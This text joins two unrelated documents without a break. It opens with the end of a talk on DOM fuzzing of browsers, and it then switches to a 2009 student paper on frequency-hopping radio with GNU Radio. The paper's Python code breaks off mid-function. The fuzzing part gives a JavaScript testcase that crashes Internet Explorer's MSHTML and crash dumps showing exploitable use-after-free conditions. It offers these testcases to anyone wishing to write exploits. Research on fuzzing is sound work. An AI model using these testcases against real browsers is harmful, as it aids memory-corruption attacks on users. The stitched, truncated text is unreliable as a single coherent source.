STACK_FRAME:MSHTML!CSpliceTreeEngine::RemoveSplice+ 0xef4 
STACK_FRAME:MSHTML!CMarkup::SpliceTreeInternal+0x95STACK_FRAME:MSHTML!CDoc::CutCopyMove+0x204 
STACK_FRAME:MSHTML!CDomRange::deleteContents+0x11f 
Crash use case I: testcase
function testcase(){ 
elementTree1[0]=document.createElement('FOOTER'); document.body.appendChild(elementTree1[0]); elementTree1[1]=document.createElement('STYLE'); document.body.appendChild(elementTree1[1]); elementTree1[2]=document.createElement('TEXTAREA');document.body.appendChild(elementTree1[2]); document.addEventListener ('DOMNodeRemoved', modifyD OM, true); 
range1 = document.createRange(); startNode=document.all[1]; range1.setStart(startNode, 0); endNode=document.all[3]; range1.setEnd(endNode,0); range1.deleteContents(); 
}function modifyDOM(event){ 
switch (event.eventPhase) { 
case Event.CAPTURING_PHASE: 
document.removeEventListener ('DOMNodeRemoved', modi fyDOM, true); 
range2 = document.createRange(); startNode=document.all[2]; range2.setStart(startNode, 0); endNode=document.all[5]; range2.setEnd(endNode,0); range2.deleteContents(); break; 
}
}   
Crash use case II 
EXCEPTION_TYPE:STATUS_ACCESS_VIOLATION EXCEPTION_SUBTYPE:DEP ... 
STACK_FRAME:MSHTML!InjectHtmlStream+0x38f 
STACK_FRAME:MSHTML!HandleHTMLInjection+0x75 STACK_FRAME:MSHTML!CElement::InjectInternal+0x6b5 
STACK_FRAME:MSHTML!CElement::put_outerHTML+0xdb 
STACK_FRAME:MSHTML!CFastDOM::CHTMLElement::Trampoli ne_Set_outerHTML+0x5e 
STACK_FRAME:jscript9!Js::JavascriptFunction::CallFu nction+0xc4 
STACK_FRAME:jscript9!Js::JavascriptExternalFunction ::ExternalFunctionThunk+0x117 
STACK_FRAME:jscript9!Js::JavascriptOperators::SetPr operty+0x8f 
STACK_FRAME:jscript9!Js::JavascriptOperators::OP_Se tProperty+0x59 
STACK_FRAME:jscript9!Js::JavascriptOperators::Patch PutValueNoLocalFastPath+0xbc 
STACK_FRAME:jscript9!Js::InterpreterStackFrame::OP_ SetProperty<Js::OpLayoutElemen 
tCP_OneByte>+0x5b ... STACK_FRAME:MSHTML!CListenerDispatch::InvokeVar+0x1 2a 
STACK_FRAME:MSHTML!CListenerDispatch::Invoke+0x40 
STACK_FRAME:MSHTML!CEventMgr::_DispatchBubblePhase+ 0x1a9 
STACK_FRAME:MSHTML!CEventMgr::Dispatch+0x724 
STACK_FRAME:MSHTML!CEventMgr::DispatchDOMMutationEv ent+0xef 
Crash use case III 
EXCEPTION_TYPE:STATUS_ACCESS_VIOLATION EXCEPTION_SUBTYPE:DEP STACK_FRAME:MSHTML!CMarkup::ElementRelease+0x42 
STACK_FRAME:MSHTML!CDocument::PrivateRelease+0x2c 
STACK_FRAME:MSHTML!CNamedItemsTable::FreeAll+0x26 
STACK_FRAME:MSHTML!CScriptCollection::~CScriptColle ction+0x20 
STACK_FRAME:MSHTML!CScriptCollection::Release+0x53 STACK_FRAME:MSHTML!CDoc::CLock::~CLock+0x17 STACK_FRAME:MSHTML!CMarkup::SetInteractiveInternal+ 0x462 
STACK_FRAME:MSHTML!CMarkup::RequestReadystateIntera ctive+0x152 
STACK_FRAME:MSHTML!CMarkup::BlockScriptExecutionHel per+0x184 
STACK_FRAME:MSHTML!CHtmPost::Exec+0x4b1 STACK_FRAME:MSHTML!CHtmPost::Run+0x41 STACK_FRAME:MSHTML!PostManExecute+0x1a3 STACK_FRAME:MSHTML!PostManResume+0xdd STACK_FRAME:MSHTML!CHtmPost::OnDwnChanCallback+0x10STACK_FRAME:MSHTML!CDwnChan::OnMethodCall+0x1f STACK_FRAME:MSHTML!GlobalWndOnMethodCall+0x115 
STACK_FRAME:MSHTML!GlobalWndProc+0x302 
STACK_FRAME:USER32!InternalCallWinProc+0x23 STACK_FRAME:USER32!UserCallWinProcCheckWow+0x14b STACK_FRAME:USER32!DispatchMessageWorker+0x35e STACK_FRAME:USER32!DispatchMessageW+0xf STACK_FRAME:IEFRAME!CTabWindow::_TabWindowThreadPro c+0x722 

Crash use case IV 
eax=066d6588 ebx=053d34b0 ecx=feeefeee edx=674a9fe7 esi=06704478 edi=000000d2 
eip=674a9fff esp=0299d05c ebp=0299d064 iopl=0         nv up ei pl nz na pe nc 
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=000 0             efl=00010206 
MSHTML!CInsertSpliceUndoUnit::`scalar deleting destr uctor'+0x18: 
674a9fff 8b91a4010000    mov edx,dword ptr [ecx+1A4h] ds:0023: 
feef0092 =???????? 
IDENTITY:HostMachine\HostUser 
PROCESSOR:X86 CLASS:USER QUALIFIER:USER_PROCESS EVENT:DEBUG_EVENT_EXCEPTION EXCEPTION_FAULTING_ADDRESS:0xfffffffffeef0092 EXCEPTION_CODE:0xC0000005 EXCEPTION_LEVEL:SECOND_CHANCE EXCEPTION_TYPE:STATUS_ACCESS_VIOLATION EXCEPTION_SUBTYPE:READ FAULTING_INSTRUCTION:674a9fff 
mov edx,dword ptr [ecx+1a4h] 
BASIC_BLOCK_INSTRUCTION_COUNT:3 BASIC_BLOCK_INSTRUCTION:674a9fff mov edx,dword ptr [ec x+1a4h] 
BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:ecx BASIC_BLOCK_INSTRUCTION:674aa005 push eax 
BASIC_BLOCK_INSTRUCTION:674aa006 call edx 

Crash use case V –heap
corruption
eax=0286d26c ebx=00000000 ecx=77010535 edx=0286d009  esi=00460000 edi=0052cef8 
eip=770b33bb esp=0286d25c ebp=0286d2d4 iopl=0         nv up ei pl zr na pe nc 
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=000 0             efl=00000246 
ntdll!RtlReportCriticalFailure+0x57: 
770b33bb eb12            jmp ntdll!RtlReportCritical Failure+0x6b (770b33cf) 
. . . EXCEPTION_FAULTING_ADDRESS:0x770b33bb EXCEPTION_CODE:0xC0000374 
EXCEPTION_LEVEL:SECOND_CHANCE 
EXCEPTION_TYPE: STATUS_HEAP_CORRUPTION 
. . . STACK_DEPTH:48 STACK_FRAME:ntdll!RtlReportCriticalFailure+0x57 STACK_FRAME:ntdll!RtlpReportHeapFailure+0x21 STACK_FRAME:ntdll!RtlpLogHeapFailure+0xa1 STACK_FRAME:ntdll!RtlFreeHeap+0x64 STACK_FRAME:kernel32!HeapFree+0x14 
STACK_FRAME:MSHTML!CAttrValue::Free+0x44 
. . . STACK_FRAME:jscript9!Recycler::FinishCollection+0x3 0 
STACK_FRAME:jscript9!Recycler::FinishConcurrentColl ect+0x220 
STACK_FRAME:jscript9!ThreadContext::ExecuteRecycler CollectionFunction+0x2a 
STACK_FRAME:jscript9!Recycler::TryFinishConcurrentC ollect+0x64 
STACK_FRAME:jscript9!Recycler::CollectNow<536875008 >+0x33 

Crash use case VI 
Infinite  recursion in addChild function 
Caught a Stack Overflow in process 1832 at 2012-09-16 0 9:59:50 with a crash hash of 07C1166D.A741038C 
Registers:
EAX = 0x6080C268 - R-- - chrome!WebCore::RenderTable:: `vftable'
EBX = 0x02817B9C - RW- -ECX = 0x02817BF8 - RW- -EDX = 0x5F31A8ED - R-X - chrome!WebCore::RenderTable: :addChild 
ESI = 0x02817BF8 - RW- -EDI = 0x02817BF8 - RW- -EBP = 0x001F3018 - RW- -ESP = 0x001F3000 - RW- -EIP = 0x5F31A8ED - R-X - chrome!WebCore::RenderTable: :addChild 
Code: 
0x5F31A8ED - push ebp 0x5F31A8EE - mov ebp, esp 0x5F31A8F0 - push ebx 
0x5F31A8F1 - mov ebx, [ebp+0ch] 
0x5F31A8F4 - push esi 0x5F31A8F5 - push edi 0x5F31A8F6 - mov edi, ecx 0x5F31A8F8 - test ebx, ebx 
Call Stack:
0x5F31ABEB - chrome!WebCore::RenderTable::addChild 0x5F31ABEB - chrome!WebCore::RenderTable::addChild 
Crash use case VII 
Infinite  recursion in notifyNodeInsertedIntoTree function 
Caught a Stack Overflow in process 3244 at 2012-09-16 0 3:32:12 with a crash hash of 9E20A997.672519F4 
Registers:
EAX = 0x0000001D - -EBX = 0x002B6D98 - RW- -ECX = 0x0214CAF0 - RW- -EDX = 0x62CAA5E0 - R-- - chrome!WebCore::HTMLTableElem ent::`vftable'
ESI = 0x0214CAF0 - RW- -EDI = 0x0209F980 - RW- -EBP = 0x001C3000 - RW- -ESP = 0x001C3000 - RW- -EIP = 0x610DF757 - R-X - chrome!WebCore::NodeRareData ::rareDataFromMap 
Code: 
0x610DF757 - push esi 0x610DF758 - mov eax, 1 
0x610DF75D - xor esi, esi 
0x610DF75F - test al, [62d65150h] 0x610DF765 - jnz 610df796h 0x610DF767 - or [62d65150h], eax 0x610DF76D - push 14h 0x610DF76F - call chrome!WTF::fastMalloc 
Call Stack:
0x60F25061 - chrome!WebCore::Element::containsFullSc reenElement 
0x611E3968 - chrome!WebCore::ChildNodeInsertionNotif ier::notifyNodeInsertedIntoTree 
0x611E28F3 - chrome!WebCore::ChildNodeInsertionNotif ier::notifyDescendantInsertedIntoTree 
Conclusions & Future works
•Fuzzing with DOM Level 2 and 3 interfaces proved to be pain ful 
for both IE  and Chrome 
•A bunch of 0-days found and many others are likely to be 
uncovered soon... Fuzz! Fuzz!! Fuzz!!!
•Extensive tests need to be done on Firefox, other browsers an d 
mobile OSes: need help from community... Fuzz! Fuzz!! Fuzz!!!
•There is NO ultimate Nduja fuzzer version: researchers c ommunity 
is encouraged to pick the code and mod it at will ...Fuzz! Fuzz!! 
Fuzz!!!
•Testcases:
–Are available for anyone whishing to write an exploit code 
–Need to be optimized in order to reliably reproduce exploit ability condition 
Q&A
Fuzz! Fuzz!! Fuzz!!!Pseudorandom Multiband Frequency Hopping for 
Interference Avoidance Using GNU Radio and USRP  
 
Thomas Bell    Kevin Gajewski   Anthony Hsu  
 
Advisors: Yu -Dong Yao, Fangming He  
 
July 24, 2009  
 
Abstract  
 
Now that computer processor speeds are 
much faster, the on ce only theoretical 
concept of So ftware -Defined R adio is now a 
practical reality.   Using an open source 
software -defined radio package called  GNU 
Radio and a basic radio hardware 
component called the Universal Software 
Radio Peripheral (USRP), we have 
implemented a primitive cognitive rad io 
system that uses energy detection to sense 
interference and pseudo -random frequency 
hopping t o then avoid it.   We wrote our 
Pseudorandom Multiband Frequency 
Hopping P rogram in Python and tested it 
using the USRP with a Flex 900 
daughterboard installed.   Using a spectrum 
analyzer to monitor the transmission signal 
and a signal generator to create interference 
(simulated by a strong signal), we tested our 
program and it was successful in detecting 
and avoiding interference.   Our program is a 
demonstration of the capabilities of 
software -defined radio and the cognitive 
radio systems that can be then be 
implemented using th is technology.  
 
Introduction  
 
Software -Defined Radio (SDR) is a radio 
communication system that implements 
most of its components in softw are instead 
of hardware. It has been theorized that SDR 
can become more intelligent and be able to 
communicate with other radios and efficiently use sections of the spectrum that 
are unused; this evolution of a smarter SDR 
would be Cognitive Radio. For SDR  to be 
enabled  as a Cog nitive Radio it must be able 
to achieve spectrum sensing, interference 
detection,  interference avoidance, and 
efficiently transmit in the spectrum without 
causing interference. In this paper we will 
go into detail about the software  kit, 
hardware, instruments, and programming 
that were used to create our SDR, test it, and 
allow it to show characteristics of a 
Cognitive Radio by exhibiting Pseudo -
Random Multi -Band Frequency Hopping.  
 
GNU Radio  
 
To implement the software components tha t 
a Software -Defined Radio uses, a  software  
kit called GNU Radio was installed.  GNU is 
a project that was created to provide a Unix -
like operating system environment that is 
comprised of free software. GNU is a 
recursive acronym that stands for GNU is 
not Unix. Building upon the GNU free 
software concept, GNU Radio is a free 
software implementation of actual radio 
hardware. It is enabl ed by signal processing 
blocks that can be used to implement 
software defined radio on e xternal RF 
hardware. Until recently,  it was necessary to 
implement those signal proce ssing blocks in 
actual hardware. However,  since processing 
power has increased steadily, it has recently 
become feasible to implement those blocks 
in software.  
 
In GNU radio, most of the applications can 
be written in the Python programming 
language. This is generally the method of 
choice, considering that it is supported by 
default. However, the actual signal 
processing paths are written in the C++ 
programming language, and uses processor 
optimization whene ver possible. Therefore, 
it is possible to write GNU Radio 
applications in many languages that offer 
C++ bindings. GNU Radio also supports the 
development of signal processing algorithms 
using recorded or generated data. This 
makes it possible to use GNU R adio without 
RF hardware.  
 
Even though GNU Radio applications can 
be implemented using various high -level 
languages, things can be further simplified 
by using the GNU Radio Companion 
(GRC). GRC is a graphical frontend to GNU 
Radio that allows the user to  create signal 
flow-graphs, which generate Python source 
code. Although we did not use the GRC for 
our actual experiment, we did use a  few 
signal processing blocks when testing out it s 
capabilities; these blocks were:   
 signal source  
 USRP  source  
 type con versions  
 FFT sink  
 audio sink  
 USRP  sink  
 variable s and variable sliders  
 
Universal Software Radio 
Peripheral (USRP)  
 
To be able to actually conduct our 
experiment , an external RF hardware that 
works in  conjunction with GNU Radio 
needed to be used . The Uni versal Serial 
Radio Peripheral (USRP ), created by Ettus 
Research LLC, is the hardware that seemed 
best to use, it also is recommended by GNU  
Radio. The USRP  allow s for the creation of 
a software radio utilizing a computer with a USB 2.0 interface, or a Gig abit Ethernet 
port. These devices include the USRP and 
the USRP2, respectively. Certain 
daughterboards, which are installed in the 
USRP, allow for these devices to be used 
with various frequency bands. As with GNU 
Radio, the USRP and USRP2 designs are 
open  source. Therefore, all USRP and 
daughterboard schematics are freely 
available for download. In this research, two 
USRP devices were used with the project. 
Both of these devices used the Flex 900 
daughterboards, which allowed for the 
transmission and recep tion of s ignals 
between 800 MHz  and 1 000 MHz . These 
devices were connected via USB 2.0 to two 
computers, which were operated by the 
Ubuntu Linux 9.04 operating system.  
 
Lab Instrument s  
 
Two instruments were us ed to assist in 
testing of the P seudor andom Multiband 
Frequency Hopping program. Both of the 
instruments were made by Agilent 
Technologies. T he first of these instruments, 
the Agilent E4445A PS A Series Spectrum 
Analyzer  was used to monitor and review 
the frequency spectrum  and watch the 
actions of the transmitter . The key 
speci fications are below:  
 
 
Figure 1: Agilent E4440A PSA Series Spectrum 
Analyzer  
Performance  of the Agilent 
E4445A PSA Series Spectrum 
Analyzer : 
 +/- 0.19 dB absolute amplitude 
accuracy  
 -155 dBm displayed average noise 
level (DANL)  
 -118 dBc/Hz p hase noise at 10 kHz 
offset  
 81 dB  W-CDMA ACLR dynamic 
range  
 
Analysis bandwidth:  
 Standard 10 MHz analysis 
bandwidth  
 Optional 40 or 80 MHz analysis 
bandwidth to capture and measure 
complex signals.  
 -78 dB third order intermodulation 
for 40 or 80 MHz analysi s bandwidth  
 Up to 300 MHz analysis bandwidth 
for calibrated VSA measurements  
  
The second  instrument used was the Agilent 
E4438C ESG Vector Signal Generator. This 
was used to transmit a signal that the 
transmitter and program would see as 
interference. T he key specifications  are 
below : 
 
 
Figure 2: Agilent E4438C ESG Vector Signal 
Generator  
 Signal Characteristics  of the 
Agilent E4438C ESG Vector Signal 
Generator : 
 250 kHz to 1, 2, 3, 4, or 6 GHz (0.01 
Hz resolution)  
 +17 dBm output power  
 160 MHz RF modulation bandwidth  
 Modulation and Sweep:  
o AM, FM, ѲM, and pulse  
o ASK, FSK, MSK, PSK, 
QAM, custom I/Q  
 Step or list, frequency and power  
 
Baseband Generation and Signal 
Creation:  
 Internal baseband generator (80 MHz 
RF BW): arbitrary waveform and 
real-time I/Q  
 64 Msa playback memory and 1 Gsa 
storage  
 Signal generation: WLAN, WiMAX, 
W-CDMA, cdma2000, GSM, DVB, 
multitone  
 Digital I/O, fading, and PC 
waveform streaming  
 
Automation and Communications 
Interface:  
 10BaseT LAN and GPIB  
 SCPI and IVI -COM drivers  
 Backwards compatible with all ESG 
signal generators  
 
Multiband Frequency Hopping  
 
Frequency hopping is a method of changing 
carrier frequencies periodically.   Usually, 
only one band is used, with the carrier 
frequency just shifting among the channels 
within the band.   However, one can also use 
multiple ban ds for frequency hopping.   This 
is called multiband frequency hopping and is 
what we  implemented in our experiment.  
 
There are many advantages to implementing 
a frequency hopping radio system.   First, by 
changing frequencies periodically, the radio 
system is less susceptible to interference, 
especially if interference detection is 
implemented in the system.   Secondly, 
frequency hopping makes signals difficult to 
intercept, making frequency hopping a 
useful tool in military applications.   Finally, 
frequency hopping allows the radio 
frequency spectrum to be utilized more 
efficiently.   Currently, much of the radio 
frequency spectrum is not heavily used or is 
used only for a short period in every twenty -
four hours.   Also, depending on one's 
location, different f requency bands will be 
used more often or more heavily than 
others.   With multiband frequency hopping, 
bands that are rarely used by their licensed 
users (primary users) could be utilized by 
other users (secondary users) when primary 
users are not using th em.  This could help 
reduce the frequency of dropped signals in 
busy networks such  as mobile phone carrier 
bands.  
 
To synchronize the transmitter and receiver 
in a frequency hopping radio system, there 
are several frequency hopping algorithms 
that have bee n developed.   One example is 
explained in a Texas Instruments paper 
entitled “Implementing a Bidirectional 
Frequency Hopping  Application With 
TRF6903 and MSP430 ” by Shreharsha Rao.  
In our experiment,  since our purpose was to 
demonstrate a frequency hopping radio 
system using GNU Radio and a USRP, we 
simply implemented pseudorandom 
frequency hopping.   The frequency hopping 
is determined by a se ed value specified by 
the user a s a parameter to the program.   
Impl ement ation  
 
To implement pseudorandom m ultiband 
frequency hopping , a few things must be 
considered. First, a certain range of 
frequencies should be considered (for 
example: from 800 MHz to 1000 MHz). Then the section of the spectrum that is 
being used should be split up into five bands 
of frequencies and those bands should be 
further segmented into five channels of 
frequencies  (to continu e the previous 
example: five 40 -MHz bands and ea ch one 
of the ban ds will be split up into five 8 -MHz 
channels). A way for the radio to detect 
interference should be designated, such as 
using an energy threshold.  
 
When running this program, two parameters 
would have to be set during initialization: 
which  of the five bands for the radio to start 
transmitting inside of, and a number which 
would be used as a seed to generate the 
random numbers that determine the 
sequence of pseudo -random frequencies. In 
theory, with just the starting band and seed, 
a receive r could be able to receive 
everything this program and it’s transmitter 
were transmitting because they would able 
to generate the same sequence of pseudo -
random frequencies.  
 
The program would start transmitting in one 
of the five channels in the specifie d band, 
and read the energy readings of the other 4 
channels. For every specified time interval  
(i.e. one second) the transmitted signal will 
jump to a different channel within the band, 
again while the other four channels’ energy 
readings are being monitor ed. When the 
average energy reading exceeds a predefined 
threshold, the program would see t his as 
interference and move it s transmission into a 
different band where it would continue to do 
the same thing.  
System Mod el and Protocol  
 
Figure 3 depicts the setup of the host PC and 
the USRP and Figure 4 depicts the flow of 
our Pseudorandom Mu ltiband F requency 
Hopping Program.  
 
Figure 3: Universal Software Radio Peripheral Setup  
 
 
Figure 4: Pseudorandom Multiband Freq uency 
Hopping Program Flow Chart  
 
Experiment a tion  
 
To test out our Pseudorandom Multib and 
Frequency Hopping program without 
interfering with any licensed bands we 
decided to use the 900MH z to 1000 MHz 
range. Within this part of the spect rum we 
broke it down into five 20 MH z bands, and 
within those fi ve bands we made five 4 MHz channels . The user is able to decide which 
band the program will start transmitting in 
and what the seed number is. The schemed 
energy detection in the previous section was 
implemented for detecting the interference 
and avoiding  it. We used the Agilent 
E4438C ESG Vector Signal Generator to 
create interference in the band we were 
transmitting in, and watched the program 
hop to a different band.  Though our 
experiment only focuses on the transmitter, 
in theory, if there were a recei ver as  well, 
you could synchronize it  with the transmitter 
by sending the seed so that it  could also 
generate the same sequence of pseudo -
random frequencies.  
 
Future work  
 
Although the group has been able to 
showcase some examples of a cognitive 
radio, our  model is still quite primitive. 
Some future work in improving our 
Cognitive Radio includes implementing new 
and more advanced frequency hopping 
algorithms. For now we have just been 
transmitting a signal source but in the future 
we also like to be able to  transmit data, 
audio, and video. Throughout this 
experiment we have not had a receiving 
radio involved but in the future it would be 
useful to have one involved to receiver 
whatever the transmitter is sending, this 
might be able to be done by giving both 
USRPs the same hopping algorithm  and 
using the aforementioned  same seed 
number . Another thing we may look into in 
the future is running programs through the 
GRC, since you can see everything on it’s 
interface and you can write your own GRC 
blocks, the GRC  could prove to be very 
useful in making creating programs easier 
and faster .  Lastly, a reasonable experiment 
to try would be to see how different 
transmitting cognitive radios communicate 
with each oth er, and if they can stay out o f 
each other’s way.  
Acknowl edgment s  
We would like to thank Professor Yu -Dong 
Yao for organizing and coordinating the 
Stevens Research Experience for 
Undergr aduates program , for giving us 
guidance and support over the course of the 
project, and for providing valuable feedback 
on our research and paper .  We also want to 
thank Fangming He for serving as our 
gradua te student mentor, explaining some 
signal processing  concepts  that were 
unfamiliar, helping us with technical 
problems , and p roviding a dvice and ideas 
along the way .  Finally, we thank the 
National Science Foundation  for providing 
the funding which made this resea rch 
possible in the f irst place and Stevens 
Institute of Tec hnology for h osting this 
program.  References  
[1] Blossom , Eric;  et al. GNU radio.   
http://www.gnu.org/software/gnuradio/ . 
 
[2] Mitola, J.,  III (1999). Software radio 
architecture: a mathematical perspective. 
IEEE Journal on Selected Areas in 
Communications , 514 -538. 
[3] Mitola, J. , III; Maguire, G. Q. , Jr. 
(1999). Cognitive radio: making 
software radios more personal. IEEE 
Personal Communications , 13-18. 
[4] Rao, S. (2004). Implementing a 
Bidirectional Frequency Hopping 
Application With TRF6903 and 
MSP430.  Dallas, TX: Texas Instruments.  
 
 
Appendix  
 
Source code  of pseudorandom multiband frequency hopping program , 
pseudo_rand_freq_hopping.py  
(http://sites.google.com/site/ahsustevens/sourcecode/pseudo_rand_freq_hopping.py ) 
 
#!/usr/bin/env python  
# 
# Copyright 2005,2007,2008,2009 Free Software Foundation, Inc.  
#  
# This file is part of GNU Radio  
#  
# GNU Radio is free software; you can redistri bute it and/or modify  
# it under the terms of the GNU General Public License as published by  
# the Free Software Foundation; either version 3, or (at your option)  
# any later version.  
#  
# GNU Radio is distributed in the hope that it will be useful,  
# but WITHOUT ANY WARRANTY; without even the implied warranty of  
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the  
# GNU General Public License for more details.  
#  
# You should have received a copy of the GNU General Public License  
# along with GN U Radio; see the file COPYING.  If not, write to  
# the Free Software Foundation, Inc., 51 Franklin Street,  
# Boston, MA 02110 -1301, USA.  
#  
 
 
### IN ORDER FOR THIS PROGRAM TO WORK ###  
 
# This program requires a USRP with the Flex 900 RX and Flex 900 TX  
# daughterboards installed. This program works best with default settings.  
 
from gnuradio import gr, gru, eng_notation, optfir, window  
from gnuradio import audio  
from gnuradio import usrp  
from gnuradio.eng_option import eng_option  
from grc_gnuradio import usr p as grc_usrp  
from optparse import OptionParser  
from usrpm import usrp_dbid  
import sys  
import math, random  
import struct  
 
 
class tune(gr.feval_dd):  
    """ 
    This class allows C++ code (bin_statistics_f.cc) to callback into python to change USRP RF 
center Frequency.  
    """ 
    def __init__(self, tb):  
        gr.feval_dd.__init__(self)  
        self.tb = tb  
 
    def eval(self, ignore):  
        """ 
        This method is called from gr.bin_statistics_f when it wants to change  
        the center frequency.  This method tunes the front end to the new center  
        frequency, and returns the new frequency as its result.  
        """ 
        try: 
            # We use this try block so that if something goes wrong from here  
            # down, at least we'll hav e a prayer of knowing what went wrong.  
            # Without this, you get a very mysterious:  
            # 
            #   terminate called after throwing an instance of 'Swig::DirectorMethodException'  
            #   Aborted  
            # 
            # message on stderr.  Not exactly helpful ;)  
 
            new_freq = self.tb.set_next_freq()  
            return new_freq  
 
        except Exception, e:  
            print "tune: Exception: ", e  
 
""" 
Class to parse the incomming messages sent by bin_statistics.  
 
1) It extracts the center frequncy and the incomming data vector length  
2) Convert received data string to a floating point format.  
3) Store the output in the "data" array  
""" 
class parse_msg(object):  
    def __init__(self, msg):  
        self.center_freq = msg.arg1()  
        self.vlen = int(msg.arg2())  
        assert(msg.length() == self.vlen * gr.sizeof_float)  
 
        # FIXME consider using Numarray or NumPy vector  
        t = msg.to_string()  
        self.raw_data = t  
        self.data = struct.unpack('% df' % (self.vlen,), t)  
 
 
class my_top_block(gr.top_block):  
 
    def __init__(self):  
        gr.top_block.__init__(self)  
 
        usage = "usage: %prog [options] min_freq seed"  
        parser = OptionParser(option_class=eng_option, usage=usage)  
        parser.add_option(" -g", "--gain", type="eng_float", default=None, # Also see line 227 
below. 
                          help="set gain in dB (default is midpoint)")  
        parser.add_option(" -R", "--rx-subdev-spec", type="subdev", default=(0,0),  
                          help="select USRP Rx side A or B (default=A)")  
        parser.add_option("", " --tune-delay", type="eng_float", default=1e -3, metavar="SECS",  
                          help="time to delay (in seconds) after changing frequency 
[default=%default]" ) 
        parser.add_option("", " --dwell-delay", type="eng_float", default=10e -3, metavar="SECS",  
                          help="time to dwell (in seconds) at a given frequncy 
[default=%default]")  
        parser.add_option("", " --real-time", action="store _true", default=False,  
                          help="Attempt to enable real -time scheduling")  
        parser.add_option(" -B", "--fusb-block-size", type="int", default=0,  
                          help="specify fast usb block size [default=%default]")  
        parser.add_option(" -N", "--fusb-nblocks", type="int", default=0,  
                          help="specify number of fast usb blocks [default=%default]")  
 
        (options, args) = parser.parse_args()  
        if len(args) != 2:  
            parser.print_ help() 
            sys.exit(1)  
         
        valid_min_freq = False  
        allowed_min_freq = (900e6, 920e6, 940e6, 960e6, 980e6)  
        for i in allowed_min_freq:  
            try: 
                if eng_notation.str_to_num(args[0]) == i:  
                    valid_min_freq = True  
            except: pass  
         
        if not valid_min_freq:  
            print "Error: min_freq must be 900e6, 920e6, 940e6, 960e6, or 980e6."  
            sys.exit(1)  
         
        try: 
            float(args[1])  
        except Exception, e:  
            print "seed must be a real number."  
            sys.exit(1)  
 
        if not options.real_time:  
            realtime = False  
        else: 
            # Attempt to enable realtime scheduling  
            r = gr.enable_realt ime_scheduling()  
            if r == gr.RT_OK:  
                realtime = True  
            else: 
                realtime = False  
                print "Note: failed to enable realtime scheduling"  
 
        # If the user hasn't set the fusb_* parameters on the command line,  
        # pick some values that will reduce latency.  
 
        if 1: 
            if options.fusb_block_size == 0 and options.fusb_nblocks == 0:  
                if realtime:                        # be more aggressive  
                    options.fusb_block_size = gr.prefs().get_long('fusb', 'rt_block_size', 1024)  
                    options.fusb_nblocks    = gr.prefs().get_long('fusb', 'rt_nblocks', 16)  
                else: 
                    options.fusb_block_size = gr.prefs().get_long(' fusb', 'block_size', 4096)  
                    options.fusb_nblocks    = gr.prefs().get_long('fusb', 'nblocks', 16)  
     
        #print "fusb_block_size =", options.fusb_block_size  
        #print "fusb_nblocks    =", options.fusb_nblocks  
         
        ### BLOCKS in the flow graph and their parameters ###  
        self.u = usrp.source_c(fusb_block_size=options.fusb_block_size,  
                               fusb_nblocks=options.fusb_nblocks)  
         
        self.fft_size = 64  
         
        self.src_fre q = src_freq = 400    # signal source frequency  
        self.samp_rate = samp_rate = 32000  
        self.interpolation = interpolation = 16  
        self.amp = amp = 10  
                                
        adc_rate = self.u.adc_rate()       # 64 MS/s  
        usrp_decim = 16  
        self.u.set_decim_rate(usrp_decim)  
        self.freq_step = usrp_rate = adc_rate / usrp_decim  # 4 MHz by default  
         
        self.min_freq = eng_notation.str_to_num(args[0])  
        self.max_freq = self.min_freq + 20e6  
        self.seed = float(args[1])  
        random.seed(self.seed)  
        print "seed = %s" % (self.seed)  
         
        if self.min_freq == 900e6: self.band = 0  
        elif self.min_freq == 920e6: self.band = 1  
        elif self.min_freq == 940e6: self.ban d = 2 
        elif self.min_freq == 960e6: self.band = 3  
        elif self.min_freq == 980e6: self.band = 4  
         
        self.min_center_freq = self.min_freq + self.freq_step/2  
        nsteps = 4  
        self.max_center_freq = self.min_center_freq + (n steps * self.freq_step)  
        self.next_freq = self.min_center_freq  
        x = random.randint(0,4)  
        self.tx_freq = tx_freq = self.min_freq + self.freq_step/2 + x * self.freq_step  
        self.curr_tx_ch = 0  
         
        # Configuration of the  USRP Sink  
        self.usink = grc_usrp.simple_sink_c(which=0, side="A")  
        self.usink.set_interp_rate(interpolation)  
        self.usink.set_frequency(tx_freq, verbose=True)  
        self.usink.set_enable(True)  
        self.usink.set_auto_tr(True)  
         
        # Configuration of the signal source  
        self.sig_src = gr.sig_source_c(samp_rate, gr.GR_SIN_WAVE, src_freq, amp, 0)  
 
        self.u.set_mux(usrp.determine_rx_mux_value(self.u, options.rx_subdev_spec))  
        self.subdev = usrp.selected_ subdev(self.u, options.rx_subdev_spec)  
        print "Using RX d'board %s" % (self.subdev.side_and_name(),)  
 
        s2v = gr.stream_to_vector(gr.sizeof_gr_complex, self.fft_size)  
 
        mywindow = window.blackmanharris(self.fft_size)  
        fft = gr.ff t_vcc(self.fft_size, True, mywindow)  
 
        #This loop is calculating the gain of the applied window  
 
        power = 0  
        for tap in mywindow:  
            power += tap*tap  
             
        c2mag = gr.complex_to_mag_squared(self.fft_size)  
 
        # use c2mag = gr.complex_to_mag(self.fft_size) if you want the power  
 
        # FIXME the log10 primitive is dog slow  
        log = gr.nlog10_ff(10, self.fft_size,  
                           -20*math.log10(self.fft_size) -10*math.log10(power/self.fft_si ze)) 
         
        tune_delay  = max(0, int(round(options.tune_delay * usrp_rate / self.fft_size)))  # in 
fft_frames  
        dwell_delay = max(1, int(round(options.dwell_delay * usrp_rate / self.fft_size))) # in 
fft_frames  
 
        self.msgq = gr.msg_qu eue(16) 
        self._tune_callback = tune(self)        # hang on to this to keep it from being GC'd  
        stats = gr.bin_statistics_f(self.fft_size, self.msgq,  
                                    self._tune_callback, tune_delay, dwell_delay)  
 
        # FIXME leave out the log10 until we speed it up  
        #self.connect(self.u, s2v, fft, c2mag, log, stats)  
         
        ### CONNECTIONS ###  
        self.connect(self.u, s2v, fft, c2mag, stats)  # USRP to FFT plot and various data sinks     
        self.connect((self.sig_src, 0), (self.usink, 0)) # signal source to USRP sink  
 
        if options.gain is None:  
            # if no gain was specified, use the mid -point in dB  
            g = self.subdev.gain_range()  
            options.gain = float(g[0]+g[1])/ 2 # = 45 for Flex 900 RX board  
                                              # (gain range from 0 to 90)  
 
        self.set_gain(options.gain)  
        print "gain =", options.gain  
 
    def set_next_freq(self):  
        target_freq = self.next_freq  
        self.next_freq = self.next_freq + self.freq_step  
        if self.next_freq > self.max_center_freq:  
            self.next_freq = self.min_center_freq  
        if target_freq == self.tx_freq:  
